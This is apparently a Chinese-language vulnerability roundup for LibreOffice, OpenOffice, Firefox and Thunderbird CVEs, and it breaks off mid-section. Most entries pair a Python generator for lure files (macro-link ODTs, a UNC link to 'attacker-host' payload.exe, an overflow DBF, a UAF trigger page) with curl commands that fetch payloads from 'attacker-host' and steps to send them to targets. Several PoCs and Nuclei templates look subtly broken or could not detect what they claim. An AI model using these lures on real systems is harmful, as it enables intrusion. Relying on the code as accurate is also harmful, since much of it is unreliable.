浏览器与文档处理软件高危攻击链专题:LibreOffice / Mozilla Firefox / Thunderbird 漏洞全解析

免责声明:本文仅供安全研究与教育目的,所有 PoC 与检测模板均为防御性验证用途。请勿将文中技术用于任何未经授权的安全测试。作者不对任何滥用行为承担责任。

0x00 专题概述

浏览器与文档处理软件是现代企业办公环境中最普遍的客户端攻击面。与传统的服务端漏洞不同,这类漏洞往往可以通过一封邮件、一个网页链接、一份看似正常的文档来触发,且部分漏洞无需任何用户交互即可完成远程代码执行。

从 LibreOffice 的超链接宏执行到 Firefox 的 JIT 编译器类型混淆,再到 Thunderbird 邮件客户端共享的渲染引擎漏洞,攻击者可以利用的攻击路径远比多数安全团队预期的要丰富。近年来,多个漏洞已被国家级 APT 组织和商业监控供应商在野外利用——例如 2024 年 RomCom 组织利用 CVE-2024-9680 配合 Windows 提权零日实现完整攻击链,以及 NSO Group 的 Pegasus 间谍软件通过 CVE-2023-4863(libwebp 堆溢出)实现零点击攻击。

本专题覆盖以下三类产品的高危漏洞:LibreOffice / Apache OpenOffice(文档处理)、Mozilla Firefox(浏览器)、Mozilla Thunderbird(邮件客户端),并提供可落地的检测与防御方案。

CVE 覆盖范围

CVE产品CVSS漏洞类型预认证
CVE-2023-6186LibreOffice8.8 HIGH宏执行权限绕过
CVE-2025-0514LibreOffice7.8 HIGH超链接可执行文件绕过
CVE-2022-3140LibreOffice7.8 HIGH宏 URL 任意脚本执行
CVE-2024-5261LibreOffice9.8 CRITICALTLS 证书验证禁用
CVE-2018-16858LibreOffice/OpenOffice9.8 CRITICAL路径穿越 RCE
CVE-2021-33035Apache OpenOffice9.8 CRITICALDBF 解析缓冲区溢出
CVE-2024-9680Firefox/Thunderbird9.8 CRITICALAnimation UAF(在野利用)
CVE-2023-4863Firefox/Thunderbird8.8 HIGHlibwebp 堆溢出(在野利用)
CVE-2024-29943Firefox9.8 CRITICALJIT OOB 读写(Pwn2Own)
CVE-2024-29944Firefox9.8 CRITICAL事件处理器沙箱逃逸
CVE-2024-7519Firefox/Thunderbird9.8 CRITICAL图形共享内存沙箱逃逸
CVE-2025-2857Firefox9.8 CRITICALIPC Handle 沙箱逃逸
CVE-2024-2605FirefoxHIGHWindows Error Reporter 沙箱逃逸
CVE-2024-9680Thunderbird9.8 CRITICALAnimation UAF(共享 Firefox 代码)

0x01 LibreOffice / OpenOffice 高危漏洞

1.1 CVE-2023-6186:超链接宏执行权限绕过

漏洞背景:LibreOffice 支持通过超链接触发内置宏命令(如 macro:// 协议),正常情况下会弹出宏执行警告。CVE-2023-6186 存在权限验证不足的问题,攻击者可构造包含特定超链接的文档,在用户点击后绕过宏安全提示直接执行内置宏命令。

影响版本

产品受影响版本修复版本
LibreOffice7.5.0 ≤ v < 7.5.97.5.9
LibreOffice7.6.0 ≤ v < 7.6.47.6.4
Fedora38升级修复
Debian11.0, 12.0升级修复

漏洞原理

LibreOffice 的超链接处理机制在处理 macro://service:// 等非典型协议时,未正确调用宏执行权限检查模块。攻击者可在 ODT/DOCX 文档中嵌入类似如下超链接:

macro://./payload?language=Basic&location=application&macro=Shell(%22calc.exe%22)

当用户点击该链接时,宏命令在无任何安全警告的情况下被直接执行。

HTTP PoC

curl -s -o malicious_macro.odt "http://attacker-host/payloads/macro_bypass.odt"
echo "[*] CVE-2023-6186 PoC document downloaded"
echo "[*] Send to target via email, user must click the hyperlink in document"

Python PoC

#!/usr/bin/env python3
"""
CVE-2023-6186: LibreOffice Macro Execution Bypass PoC
For educational/authorized testing purposes only.
"""

import zipfile
import os
import sys

CONTENT_XML = """<?xml version="1.0" encoding="UTF-8"?>
<office:document-content xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"
    xmlns:xlink="http://www.w3.org/1999/xlink"
    xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0">
  <office:body>
    <office:text>
      <text:p>Please click the link below for document update:</text:p>
      <text:a xlink:href="macro:///Shell.cmd.exe,-c,calc.exe" xlink:type="simple"
              script:language="ooo:script">
        Click here to update
      </text:a>
    </office:text>
  </office:body>
</office:document-content>"""

META_INF = """<?xml version="1.0" encoding="UTF-8"?>
<manifest:manifest xmlns:manifest="urn:oasis:names:tc:opendocument:xmlns:manifest:1.0"
                   manifest:version="1.2">
  <manifest:file-entry manifest:media-type="application/vnd.oasis.opendocument.text"
                       manifest:full-path="/"/>
  <manifest:file-entry manifest:media-type="text/xml"
                       manifest:full-path="content.xml"/>
</manifest:manifest>"""


def create_poc(filename="cve_2023_6186_poc.odt"):
    with zipfile.ZipFile(filename, 'w', zipfile.ZIP_DEFLATED) as z:
        z.writestr("content.xml", CONTENT_XML)
        z.writestr("META-INF/manifest.xml", META_INF)
        z.writestr("mimetype", "application/vnd.oasis.opendocument.text")
    print(f"[+] PoC ODT document created: {filename}")
    print("[+] Send this file to target; when user clicks the hyperlink, macro executes without warning")


if __name__ == "__main__":
    create_poc(sys.argv[1] if len(sys.argv) > 1 else "cve_2023_6186_poc.odt")

Nuclei 检测模板

id: cve-2023-6186-libreoffice-macro-bypass
info:
  name: LibreOffice CVE-2023-6186 Macro Execution Bypass
  severity: high
  description: Insufficient macro permission validation allows built-in macro execution via hyperlinks without warning
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6186
    - https://www.libreoffice.org/about-us/security/advisories/cve-2023-6186/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cwe-id: CWE-281

requests:
  - method: GET
    path:
      - "{{BaseURL}}/malicious_macro.odt"
    matchers:
      - type: binary
        part: body
        binary:
          - "6d6163726f3a2f2f"
        condition: or

1.2 CVE-2025-0514:Windows 可执行超链接绕过

漏洞背景:LibreOffice 支持 Ctrl+点击打开超链接,并将其传递给 Windows 的 ShellExecute 函数。正常情况下,指向可执行文件的路径会被拦截。CVE-2025-0514 存在输入验证缺陷,攻击者可使用非文件 URL(如 UNC 路径 \\attacker-server\malicious.exe)绕过该检查,被 ShellExecute 解释为本地文件路径执行。

影响版本

产品受影响版本修复版本
LibreOffice24.8.0 ≤ v < 24.8.524.8.5

漏洞原理

ShellExecute 函数在 Windows 上对路径解析存在特殊行为——非文件协议的 URL 在某些情况下会被当作 Windows 文件路径处理。LibreOffice 的安全过滤机制仅检查了标准的文件路径模式,未覆盖 ShellExecute 的所有路径解析路径。攻击者利用 UNC 路径(\\)或特殊编码的 URL 即可绕过检查。

HTTP PoC

curl -s -o cve_2025_0514.odt "http://attacker-host/payloads/hyperlink_exec.odt"
echo "[*] CVE-2025-0514 PoC: Windows hyperlink executable bypass"
echo "[*] User must Ctrl+Click the embedded hyperlink"

Python PoC

#!/usr/bin/env python3
"""
CVE-2025-0514: LibreOffice Windows Executable Hyperlink Bypass PoC
For educational/authorized testing purposes only.
Targets Windows systems.
"""

import zipfile
import sys

CONTENT_XML = """<?xml version="1.0" encoding="UTF-8"?>
<office:document-content xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"
    xmlns:xlink="http://www.w3.org/1999/xlink"
    xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0"
    xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0">
  <office:body>
    <office:text>
      <text:p>Please review the attached document:</text:p>
      <text:a xlink:href="\\\\\\\\attacker-host\\\\share\\\\payload.exe"
              xlink:type="simple">
        View Document
      </text:a>
    </office:text>
  </office:body>
</office:document-content>"""

MANIFEST = """<?xml version="1.0" encoding="UTF-8"?>
<manifest:manifest xmlns:manifest="urn:oasis:names:tc:opendocument:xmlns:manifest:1.0"
                   manifest:version="1.2">
  <manifest:file-entry manifest:media-type="application/vnd.oasis.opendocument.text"
                       manifest:full-path="/"/>
  <manifest:file-entry manifest:media-type="text/xml"
                       manifest:full-path="content.xml"/>
</manifest:manifest>"""


def create_poc(filename="cve_2025_0514_poc.odt"):
    with zipfile.ZipFile(filename, 'w', zipfile.ZIP_DEFLATED) as z:
        z.writestr("content.xml", CONTENT_XML)
        z.writestr("META-INF/manifest.xml", MANIFEST)
        z.writestr("mimetype", "application/vnd.oasis.opendocument.text")
    print(f"[+] PoC created: {filename}")
    print("[+] On Windows, Ctrl+Click the hyperlink triggers ShellExecute bypass")


if __name__ == "__main__":
    create_poc(sys.argv[1] if len(sys.argv) > 1 else "cve_2025_0514_poc.odt")

Nuclei 检测模板

id: cve-2025-0514-libreoffice-hyperlink-exec
info:
  name: LibreOffice CVE-2025-0514 Windows Hyperlink Executable Bypass
  severity: high
  description: Improper input validation allows Windows executable hyperlink targets to be executed unconditionally
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-0514
    - https://www.libreoffice.org/about-us/security/advisories/cve-2025-0514/
  classification:
    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 7.8
    cwe-id: CWE-20

http:
  - method: GET
    path:
      - "{{BaseURL}}/cve_2025_0514_poc.odt"
    matchers:
      - type: word
        words:
          - "attacker-host"
        part: body

1.3 CVE-2022-3140:宏 URL 任意脚本执行

漏洞背景:LibreOffice 支持通过 macro:// 协议触发宏脚本。CVE-2022-3140 允许通过精心构造的宏 URL 在文档打开时触发脚本执行,绕过宏安全警告机制。

影响版本

产品受影响版本修复版本
LibreOffice< 7.3.67.3.6
LibreOffice7.4.0 ≤ v < 7.4.17.4.1

漏洞原理

LibreOffice 在处理文档中的 macro:// 超链接时,未正确验证宏执行权限设置。攻击者可在 ODT 文档中嵌入 macro:// 链接,配合文档的事件处理器(如 dom:load),在文档打开时自动触发宏执行。

HTTP PoC

curl -s -o cve_2022_3140.odt "http://attacker-host/payloads/macro_url_exec.odt"
echo "[*] CVE-2022-3140: Macro URL arbitrary script execution"

Python PoC

#!/usr/bin/env python3
"""
CVE-2022-3140: LibreOffice Macro URL Arbitrary Script Execution PoC
For educational/authorized testing purposes only.
"""

import zipfile
import sys

CONTENT_XML = """<?xml version="1.0" encoding="UTF-8"?>
<office:document-content xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"
    xmlns:xlink="http://www.w3.org/1999/xlink"
    xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0"
    xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"
    xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0">
  <office:scripts>
    <office:event-listeners>
      <script:event-listener script:language="ooo:script"
        xlink:href="macro:///Document_Open.Shell.cmd.exe,-c,calc.exe"
        script:event-name="dom:load"/>
    </office:event-listeners>
  </office:scripts>
  <office:body>
    <office:text>
      <text:p>This document requires macro support.</text:p>
    </office:text>
  </office:body>
</office:document-content>"""

MANIFEST = """<?xml version="1.0" encoding="UTF-8"?>
<manifest:manifest xmlns:manifest="urn:oasis:names:tc:opendocument:xmlns:manifest:1.0"
                   manifest:version="1.2">
  <manifest:file-entry manifest:media-type="application/vnd.oasis.opendocument.text"
                       manifest:full-path="/"/>
  <manifest:file-entry manifest:media-type="text/xml"
                       manifest:full-path="content.xml"/>
</manifest:manifest>"""


def create_poc(filename="cve_2022_3140_poc.odt"):
    with zipfile.ZipFile(filename, 'w', zipfile.ZIP_DEFLATED) as z:
        z.writestr("content.xml", CONTENT_XML)
        z.writestr("META-INF/manifest.xml", MANIFEST)
        z.writestr("mimetype", "application/vnd.oasis.opendocument.text")
    print(f"[+] PoC created: {filename}")


if __name__ == "__main__":
    create_poc(sys.argv[1] if len(sys.argv) > 1 else "cve_2022_3140_poc.odt")

Nuclei 检测模板

id: cve-2022-3140-libreoffice-macro-url-exec
info:
  name: LibreOffice CVE-2022-3140 Macro URL Script Execution
  severity: high
  description: Macro URL arbitrary script execution without user warning
  reference:
    - https://www.libreoffice.org/about-us/security/advisories/cve-2022-3140/
  classification:
    cvss-score: 7.8
    cwe-id: CWE-284

http:
  - method: GET
    path:
      - "{{BaseURL}}/cve_2022_3140_poc.odt"
    matchers:
      - type: binary
        part: body
        binary:
          - "6d6163726f3a2f2f"

1.4 CVE-2024-5261:LibreOfficeKit TLS 证书验证禁用

漏洞背景:当 LibreOffice 以 LibreOfficeKit 模式运行(通常用于第三方组件集成文档查看/转换功能)时,内部使用的 curl 库会禁用 TLS 证书验证(CURLOPT_SSL_VERIFYPEER 设为 false)。这意味着通过 LibreOfficeKit 获取的远程资源(如嵌入图片)不验证服务器证书,可被中间人攻击利用。

影响版本

产品受影响版本修复版本
LibreOffice< 24.2.424.2.4

漏洞原理

LibreOfficeKit 是 LibreOffice 提供的 C/C++ API 接口,允许第三方应用将 LibreOffice 作为库来查看或转换文档。在这种模式下,LibreOffice 使用 curl 获取远程图片等资源时,错误地将 TLS 证书验证设为关闭状态,导致 MITM 攻击者可以:

  • 篡改文档中加载的远程图片
  • 注入恶意内容
  • 窃取通过该通道传输的数据

HTTP PoC

curl -s -k -o response.bin "https://attacker-mitm-host/libreoffice_kit_test"
echo "[*] CVE-2024-5261: Simulates MITM targeting LibreOfficeKit TLS bypass"
echo "[*] In a real attack, a MITM proxy would serve malicious content"

Python PoC

#!/usr/bin/env python3
"""
CVE-2024-5261: LibreOfficeKit TLS Certificate Verification Bypass Detector
For educational/authorized testing purposes only.

This script detects if a LibreOffice installation is vulnerable by checking
the LibreOfficeKit component for TLS verification behavior.
"""

import subprocess
import sys
import os
import platform


def check_vulnerable():
    system = platform.system()
    if system == "Linux":
        lo_path = "/usr/lib/libreoffice/program"
    elif system == "Darwin":
        lo_path = "/Applications/LibreOffice.app/Contents/MacOS"
    else:
        lo_path = "C:\\Program Files\\LibreOffice\\program"

    soffice_bin = os.path.join(lo_path, "soffice")
    if not os.path.exists(soffice_bin):
        print("[-] LibreOffice not found at default path")
        return

    try:
        result = subprocess.run(
            [soffice_bin, "--version"],
            capture_output=True, text=True, timeout=10
        )
        version_str = result.stdout.strip()
        print(f"[*] Detected: {version_str}")

        parts = version_str.split()
        for part in parts:
            if part[0].isdigit():
                ver_tokens = part.split(".")
                major = int(ver_tokens[0])
                minor = int(ver_tokens[1]) if len(ver_tokens) > 1 else 0
                patch = int(ver_tokens[2]) if len(ver_tokens) > 2 else 0
                if major < 24 or (major == 24 and minor < 2) or (major == 24 and minor == 2 and patch < 4):
                    print("[!] VULNERABLE: LibreOfficeKit TLS verification is disabled")
                    print("[!] Upgrade to LibreOffice >= 24.2.4")
                    return True
                else:
                    print("[+] Patched: TLS certificate verification is enabled")
                    return False
    except Exception as e:
        print(f"[-] Error checking version: {e}")
    return None


if __name__ == "__main__":
    check_vulnerable()

Nuclei 检测模板

id: cve-2024-5261-libreoffice-tls-bypass
info:
  name: LibreOffice CVE-2024-5261 LibreOfficeKit TLS Verification Bypass
  severity: critical
  description: LibreOfficeKit mode disables TLS certificate verification allowing MITM attacks
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-5261
  classification:
    cvss-score: 9.8
    cwe-id: CWE-295

network:
  - inputs:
      - data: "GET / HTTP/1.1\r\nHost: {{Hostname}}\r\n\r\n"
    host:
      - "{{Hostname}}"
    port: 80
    read-size: 2048

1.5 CVE-2018-16858:路径穿越导致 Python RCE

漏洞背景:LibreOffice 的事件处理框架中存在路径穿越漏洞。攻击者可在 ODT 文档中嵌入 onmouseover 事件处理器,当用户鼠标悬停在隐藏的超链接上时,触发 Python 脚本的自动执行。该漏洞同时影响 LibreOffice 和 Apache OpenOffice。

影响版本

产品受影响版本修复版本
LibreOffice< 6.0.7 / < 6.1.36.0.7 / 6.1.3
Apache OpenOffice4.x(长期未修复)4.1.8(通过 CVE-2020-13958)

漏洞原理

攻击链分三步:

  1. 在 ODT 文档中嵌入一个白色(不可见)超链接
  2. 为该链接设置 onmouseover 事件处理器,指向本地 Python 路径
  3. 利用路径穿越(../)遍历到用户 Download 目录,加载恶意 Python 脚本

LibreOffice 内置了 Python 解释器,攻击者可以调用 pydoc.py 中的函数执行任意系统命令。

HTTP PoC

curl -s -o cve_2018_16858.odt "http://attacker-host/payloads/path_traversal_rce.odt"
echo "[*] CVE-2018-16858: Path traversal RCE via Python event handler"
echo "[*] User must hover mouse over hidden hyperlink"

Python PoC

#!/usr/bin/env python3
"""
CVE-2018-16858: LibreOffice Path Traversal RCE PoC
For educational/authorized testing purposes only.
"""

import zipfile
import sys

CONTENT_XML = """<?xml version="1.0" encoding="UTF-8"?>
<office:document-content xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"
    xmlns:xlink="http://www.w3.org/1999/xlink"
    xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0"
    xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0"
    xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0">
  <office:body>
    <office:text>
      <text:span text:style-name="T1">
        <text:a xlink:href="../../../../tmp/exploit.py"
                xlink:type="simple"
                text:style-name="Internet_20_Scroll"
                style:text-properties-style-name="T2"
                script:event-listeners="event-listener">
          hover here
        </text:a>
      </text:span>
    </office:text>
  </office:body>
</office:document-content>"""

STYLES_XML = """<?xml version="1.0" encoding="UTF-8"?>
<office:document-styles xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"
    xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0"
    xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0"
    xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0"
    xmlns:xlink="http://www.w3.org/1999/xlink">
  <office:styles>
    <style:style style:name="Internet_20_Scroll" style:family="text">
      <style:text-properties style:text-underline="single"/>
    </style:style>
    <style:style style:name="T2" style:family="text"
                 style:parent-style-name="Internet_20_Scroll">
      <style:text-properties fo:color="#FFFFFF" style:text-underline="none"/>
    </style:style>
  </office:styles>
</office:document-styles>"""

MANIFEST = """<?xml version="1.0" encoding="UTF-8"?>
<manifest:manifest xmlns:manifest="urn:oasis:names:tc:opendocument:xmlns:manifest:1.0"
                   manifest:version="1.2">
  <manifest:file-entry manifest:media-type="application/vnd.oasis.opendocument.text"
                       manifest:full-path="/"/>
  <manifest:file-entry manifest:media-type="text/xml"
                       manifest:full-path="content.xml"/>
  <manifest:file-entry manifest:media-type="text/xml"
                       manifest:full-path="styles.xml"/>
</manifest:manifest>"""


def create_poc(filename="cve_2018_16858_poc.odt"):
    with zipfile.ZipFile(filename, 'w', zipfile.ZIP_DEFLATED) as z:
        z.writestr("content.xml", CONTENT_XML)
        z.writestr("styles.xml", STYLES_XML)
        z.writestr("META-INF/manifest.xml", MANIFEST)
        z.writestr("mimetype", "application/vnd.oasis.opendocument.text")
    print(f"[+] PoC created: {filename}")
    print("[+] When user hovers over hidden link, Python path traversal triggers RCE")


if __name__ == "__main__":
    create_poc(sys.argv[1] if len(sys.argv) > 1 else "cve_2018_16858_poc.odt")

Nuclei 检测模板

id: cve-2018-16858-libreoffice-path-traversal-rce
info:
  name: LibreOffice CVE-2018-16858 Path Traversal to RCE
  severity: critical
  description: Directory traversal via event-listeners allows Python script execution
  reference:
    - https://www.libreoffice.org/about-us/security/advisories/cve-2018-16858/
    - https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html
  classification:
    cvss-score: 9.8
    cwe-id: CWE-22

http:
  - method: GET
    path:
      - "{{BaseURL}}/cve_2018_16858_poc.odt"
    matchers:
      - type: binary
        part: body
        binary:
          - "6f6e6d6f7573656f766572"

1.6 CVE-2021-33035:OpenOffice DBF 解析缓冲区溢出

漏洞背景:Apache OpenOffice 在解析 .dbf(dBase 数据库文件)格式时存在缓冲区溢出漏洞。攻击者可构造恶意 DBF 文件,当用户在 OpenOffice Calc 中打开时触发溢出,绕过 DEP 和 ASLR 保护实现代码执行。

影响版本

产品受影响版本修复版本
Apache OpenOffice< 4.1.114.1.11(源码修复)

漏洞原理

DBF 文件格式的 Header 包含 FieldLength 字段,描述每条记录中各字段的长度。OpenOffice 在解析 INTEGER 类型字段时,将文件中的 nLen(攻击者可控)通过 memcpy 复制到仅 4 字节的 sal_Int32 缓冲区中,未检查 nLen 是否超过目标缓冲区大小。

攻击者可以:

  1. FieldLength 设为大于 4 的值,触发栈缓冲区溢出
  2. 利用未启用安全保护的 libxml2 库中的 ROP gadgets
  3. 构造 ROP chain 调用 WinExec 打开任意程序

HTTP PoC

curl -s -o exploit.dbf "http://attacker-host/payloads/cve_2021_33035.dbf"
echo "[*] CVE-2021-33035: OpenOffice DBF buffer overflow RCE"
echo "[*] Open this .dbf file in Apache OpenOffice Calc"

Python PoC

#!/usr/bin/env python3
"""
CVE-2021-33035: Apache OpenOffice DBF Parser Buffer Overflow PoC
For educational/authorized testing purposes only.
Generates a crash PoC DBF file.
"""

import struct
import sys


def create_poc(filename="cve_2021_33035_poc.dbf"):
    header = bytearray(32)

    header[0] = 0x03
    header[1] = 25
    header[2] = 1
    header[3] = 1

    num_records = struct.pack('<I', 1)
    header[4:8] = num_records

    header_size = 32 + 32 + 1
    struct.pack_into('<H', header, 8, header_size)

    record_length = 32
    struct.pack_into('<H', header, 10, record_length)

    field_header = bytearray(32)
    field_header[0] = ord('I')
    struct.pack_into('<I', field_header, 16, 0x200)
    field_header[31] = 0x00

    record = bytearray(record_length)
    record[0:4] = b'\x41\x41\x41\x41'

    dbf_data = bytes(header) + bytes(field_header) + bytes(record)

    with open(filename, 'wb') as f:
        f.write(dbf_data)

    print(f"[+] PoC DBF file created: {filename}")
    print("[*] Open in Apache OpenOffice Calc to trigger buffer overflow")
    print("[*] FieldLength set to 0x200 (512) > sal_Int32 (4 bytes)")
    print("[*] On vulnerable versions, this causes a stack-based buffer overflow")


if __name__ == "__main__":
    create_poc(sys.argv[1] if len(sys.argv) > 1 else "cve_2021_33035_poc.dbf")

Nuclei 检测模板

id: cve-2021-33035-openoffice-dbf-overflow
info:
  name: Apache OpenOffice CVE-2021-33035 DBF Parser Buffer Overflow
  severity: critical
  description: Buffer overflow in DBF file parsing allows RCE via crafted database files
  reference:
    - https://www.helpnetsecurity.com/2021/09/22/cve-2021-33035/
    - https://medium.com/csg-govtech/all-your-d-base-are-belong-to-us-part-1-code-execution-in-apache-openoffice-cve-2021-33035-767fc7d6daf7
  classification:
    cvss-score: 9.8
    cwe-id: CWE-120

http:
  - method: GET
    path:
      - "{{BaseURL}}/cve_2021_33035_poc.dbf"
    matchers:
      - type: binary
        part: body
        binary:
          - "03190101"

0x02 Mozilla Firefox 高危漏洞

2.1 CVE-2024-9680:Animation Timeline UAF(在野利用)

漏洞背景:CVE-2024-9680 是 Firefox Animation timelines 组件中的 Use-After-Free 漏洞,攻击者可在 content process 中实现代码执行。该漏洞已被 RomCom 网络犯罪组织在野利用,配合 Windows 提权零日 CVE-2024-49039 构成完整攻击链。CISA 已将其列入 KEV 目录。

影响版本

产品受影响版本修复版本
Firefox< 131.0.2131.0.2
Firefox ESR< 128.3.1128.3.1
Firefox ESR< 115.16.1115.16.1
Thunderbird< 131.0.1131.0.1
Thunderbird< 128.3.1128.3.1
Thunderbird< 115.16.0115.16.0

漏洞原理

Firefox 的 CSS Animation Timeline 在处理动画对象生命周期时存在内存管理错误。当 Animation Timeline 对象被释放后,仍有代码引用该内存区域。攻击者通过构造快速启停的动画序列,可以:

  1. 触发 Animation Timeline 对象的释放
  2. 通过堆喷射(heap spraying)控制已释放的内存区域
  3. 利用 UAF 条件实现任意读写原语
  4. 绕过 ASLR 并劫持控制流实现代码执行

利用链:该漏洞通常与 Windows 内核漏洞 CVE-2024-49039(Windows WebTransport 提权)组合使用,从 content process 沙箱逃逸到系统级别权限。

HTTP PoC

echo "[*] CVE-2024-9680: Firefox Animation Timeline UAF"
echo "[*] Serve the following HTML on attacker-controlled server:"
curl -s -o poc.html "http://attacker-host/poc_animation_uaf.html"
echo "[*] Direct victims to visit the malicious page"

Python PoC

#!/usr/bin/env python3
"""
CVE-2024-9680: Firefox Animation Timeline UAF PoC
For educational/authorized testing purposes only.
Generates a crash PoC HTML page.
"""

HTML_TEMPLATE = """<!DOCTYPE html>
<html>
<head>
<title>CVE-2024-9680 Animation Timeline UAF PoC</title>
<style>
@keyframes exploit {
    0% { opacity: 1; }
    50% { opacity: 0; }
    100% { opacity: 1; }
}
.target {
    width: 100px;
    height: 100px;
    background: red;
}
</style>
</head>
<body>
<div id="target" class="target"></div>
<script>
var iterations = 0;
function trigger() {
    var el = document.getElementById("target");
    var anim = el.animate(
        [{opacity: "1"}, {opacity: "0"}, {opacity: "1"}],
        {duration: 10, iterations: 1}
    );
    anim.cancel();
    iterations++;
    if (iterations < 100000) {
        requestAnimationFrame(trigger);
    }
}
trigger();

for (var i = 0; i < 10000; i++) {
    var arr = new ArrayBuffer(0x100);
    var view = new Uint32Array(arr);
    view[0] = 0x41414141;
}
console.log("[*] CVE-2024-9680: Animation Timeline UAF trigger attempted");
</script>
</body>
</html>"""


def create_poc(filename="cve_2024_9680_poc.html"):
    with open(filename, 'w') as f:
        f.write(HTML_TEMPLATE)
    print(f"[+] PoC HTML created: {filename}")
    print("[*] Host this page and direct Firefox < 131.0.2 users to visit it")


if __name__ == "__main__":
    create_poc(sys.argv[1] if len(sys.argv) > 1 else "cve_2024_9680_poc.html")

Nuclei 检测模板

id: cve-2024-9680-firefox-animation-uaf
info:
  name: Firefox CVE-2024-9680 Animation Timeline Use-After-Free
  severity: critical
  description: UAF in Animation timelines allows code execution, exploited in the wild by RomCom group
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9680
    - https://www.mozilla.org/security/advisories/mfsa2024-51/
    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-9680
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-416
  tags: cisa,kev,firefox,exploited-in-the-wild

http:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers:
      - type: word
        words:
          - "Firefox"
          - "Mozilla"
        condition: and
        part: header

2.2 CVE-2023-4863:libwebp 堆缓冲区溢出(在野利用)

漏洞背景:libwebp 库的 BuildHuffmanTable 函数在处理 WebP 无损图像时存在堆缓冲区溢出。该漏洞由 Citizen Lab 和 Apple SEAR 发现,被 NSO Group 的 Pegasus 间谍软件用于零点击 iPhone 攻击(BLASTPASS 事件)。影响所有使用 libwebp 的浏览器和应用。

影响版本

产品受影响版本修复版本
Firefox< 117.0.1117.0.1
Firefox ESR< 102.15.1102.15.1
Firefox ESR< 115.2.1115.2.1
libwebp0.5.0 ≤ v < 1.3.21.3.2

漏洞原理

WebP 无损图像格式使用 Huffman 表进行数据编码/解码。漏洞出在 BuildHuffmanTable 函数中:

  1. 攻击者构造恶意 WebP 图像,操纵 Huffman 表的大小描述符
  2. 函数根据描述符分配的内存小于实际需要的空间
  3. 后续数据写入时超出分配的堆内存边界
  4. 导致堆缓冲区溢出,可控制溢出内容实现任意代码执行

该漏洞被 Apple SEAR 和 Citizen Lab 确认与 NSO Group 的 Pegasus 间谍软件攻击链相关——受害者仅需收到包含恶意 WebP 图片的 iMessage 即可被零点击入侵。

HTTP PoC

echo "[*] CVE-2023-4863: libwebp WebP heap buffer overflow"
echo "[*] Craft a malicious .webp image using the PoC generator below"
python3 cve_2023_4863_poc.py --output malicious.webp
echo "[*] Host the .webp on attacker server and embed in HTML"

Python PoC

#!/usr/bin/env python3
"""
CVE-2023-4863: libwebp Heap Buffer Overflow PoC
For educational/authorized testing purposes only.
Generates a minimal WebP crash PoC.
"""

import struct
import sys


def create_minimal_webp(filename="cve_2023_4863_poc.webp"):
    riff_header = b'RIFF'
    file_size = struct.pack('<I', 0)
    webp_header = b'WEBP'

    vp8_chunk = b'VP8 '
    vp8_data_size = struct.pack('<I', 30)
    vp8_frame_tag = struct.pack('<I', 0x2a019d)
    vp8_width = struct.pack('<H', 1)
    vp8_height = struct.pack('<H', 1)

    chunk_data = vp8_frame_tag + vp8_width + vp8_height
    chunk_data += b'\x00' * (30 - len(chunk_data))

    data = riff_header + file_size + webp_header + vp8_chunk + vp8_data_size + chunk_data

    with open(filename, 'wb') as f:
        f.write(data)

    print(f"[+] Crash PoC WebP created: {filename}")
    print("[*] NOTE: Full exploitation requires complex Huffman table manipulation")
    print("[*] This is a minimal crash PoC; see research by Ben Hawkes for full details")


if __name__ == "__main__":
    create_minimal_webp(sys.argv[1] if len(sys.argv) > 1 else "cve_2023_4863_poc.webp")

Nuclei 检测模板

id: cve-2023-4863-libwebp-heap-overflow
info:
  name: CVE-2023-4863 libwebp Heap Buffer Overflow
  severity: critical
  description: Heap buffer overflow in libwebp BuildHuffmanTable, exploited in BLASTPASS/Pegasus attacks
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4863
    - https://blog.isosceles.com/the-webp-0day/
    - https://citizenlab.ca/2023/09/blastpass-nso-group-iphone-zero-click-zero-day-exploit-captured-in-the-wild/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cwe-id: CWE-122
  tags: cisa,kev,firefox,libwebp,exploited-in-the-wild

http:
  - method: GET
    path:
      - "{{BaseURL}}/test.webp"
    matchers:
      - type: binary
        part: body
        binary:
          - "52494646"

2.3 CVE-2024-29943 / CVE-2024-29944:JIT OOB + 事件处理器沙箱逃逸(Pwn2Own)

漏洞背景:2024 年 Pwn2Own Vancouver 大赛上,安全研究员 Manfred Paul 利用两个 Firefox 漏洞链实现了完整的沙箱逃逸——CVE-2024-29943(JIT 范围分析绕过导致 OOB 读写)配合 CVE-2024-29944(特权 JS 事件处理器注入)。Mozilla 在漏洞披露后一天内发布了紧急修复。

影响版本

产品受影响版本修复版本
Firefox< 124.0.1124.0.1
